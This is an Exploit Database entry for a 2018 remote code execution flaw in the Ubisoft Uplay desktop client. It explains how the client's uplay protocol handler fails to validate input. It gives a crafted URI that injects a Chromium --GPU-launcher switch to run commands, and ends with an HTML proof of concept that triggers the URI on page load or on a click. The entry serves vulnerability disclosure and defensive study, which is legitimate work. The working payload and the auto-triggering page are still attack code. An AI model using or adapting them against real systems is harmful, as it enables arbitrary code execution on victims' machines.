Ubisoft Uplay Desktop Client 63.0.5699.0 – Remote Code Execution

• Exploit Database
• 94 阅读

• 作者： Che-Chun Kuo
  日期： 2018-09-18
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45429/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83

  # Exploit Title: Ubisoft Uplay Desktop Client 63.0.5699.0 - Remote Code Execution # Date: 2018-09-01 # Exploit Author: Che-Chun Kuo # Vulnerability Type: URI Parsing Command Injection # Vendor Homepage: https://www.ubisoft.com/en-us/ # Software Link: https://uplay.ubi.com/ # Version: 63.0.5699.0 # Tested on: Windows, Microsoft Edge # Advisory: https://forums.ubi.com/showthread.php/1912340-Uplay-PC-Client-July-17th-2018 # CVE: N/A   # Vulnerability # The Uplay desktop client does not properly validate user-controlled data passed to its custom # uplay URI protocol handler. This flaw can be used to exploit the Chromium Embedded Framework (CEF) # integrated within the Uplay client, allowing for arbitrary code execution.   # Installing Uplay registers the following custom uplay protocol handler: # HKEY_CLASSES_ROOT # uplay # (Default) = "URL:uplay Protocol" # URL Protocol = "" # DefaultIcon # (Default) = "upc.exe" # Shell # Open # Command # (Default) = "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "%1"   # The %1 will be replaced with arguments from the URI. The following crafted URI performs arbitrary code execution:   &apos;uplay://foobar" --GPU-launcher="cmd /K whoami &" --&apos;   # When a victim opens this URI, the string is passed to the Windows ShellExecute function. # Microsoft states the following: "When ShellExecute executes the pluggable protocol handler with a # string on the command line, any non-encoded spaces, quotes, and backslashes in the URI will # be interpreted as part of the command line. This means that if you use C/C++’s argc and # argv to determine the arguments passed to your application, the string may be broken # across multiple parameters." # "Malicious parties could use additional quote or backslash characters to pass additional command # line parameters. For this reason, pluggable protocol handlers should assume that any parameters on # the command line could come from malicious parties, and carefully validate them."   # The Uplay desktop client does not properly validate user-controlled data. An attacker can inject # certain Chromium flags that allow for arbitrary code execution. The malicious URI breaks the # command line with a quote character and inserts a new switch called --GPU-launcher. Since the # Uplay client uses the Chromium Embedded Framework (CEF), Chromium command lines switches are supported. # The --GPU-launcher switch provides a method to execute arbitrary commands. The following string shows # the final command, which opens the Windows command prompt and executes the whoami program. "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\upc.exe" "foobar" --GPU-launcher="cmd /K whoami &" --" # Attack Scenario # The following attack scenario would result in the compromise of a victim&apos;s machine with the vulnerable # Uplay client installed. A user running Microsoft Edge visits a specially crafted webpage or clicks on a # specially crafted link. The user is served with the prompt: Did you mean to switch apps? Microsoft Edge # is trying to open "UPlay launcher". After the user gives consent, the vulnerable application runs, # resulting in arbitrary code execution in the context of the current process.   # This scenario also works on IE, but the IE browser shows the URI string to be opened and warns users against # opening untrusted content. Microsoft Edge provides no such warning. Chrome and Firefox both escape # illegal characters before passing the URI to the protocol handler.   # After Uplay desktop client (upc.exe) is run, upc.exe will attempt to open additional executables # before the --GPU-launcher is activated. One notable executable is the UplayService.exe. UplayService # requires elevated privileges. If the user is a non-administrative user a UAC prompt will appear. # It should be noted, this UAC prompt doesn&apos;t prevent command execution from occurring. # Regardless of which option the user chooses within the UplayService UAC prompt (Yes/No), # command execution will still occur once the code that passes the --GPU-launcher switch # to the CEF is triggered within upc.exe.   # Proof of Concept # The following POC provides two avenues to trigger the vulnerability within Microsoft Edge. # The first method triggers when the webpage is opened. The second method triggers when the # hyperlink is clicked by a user.   <!doctype html> <a href=&apos;uplay://foobar" --GPU-launcher="cmd /K whoami &" --&apos;>ubisoft uplay desktop client rce poc</a>   <script> window.location = &apos;uplay://foobar" --GPU-launcher="cmd /K whoami &" --&apos; </script>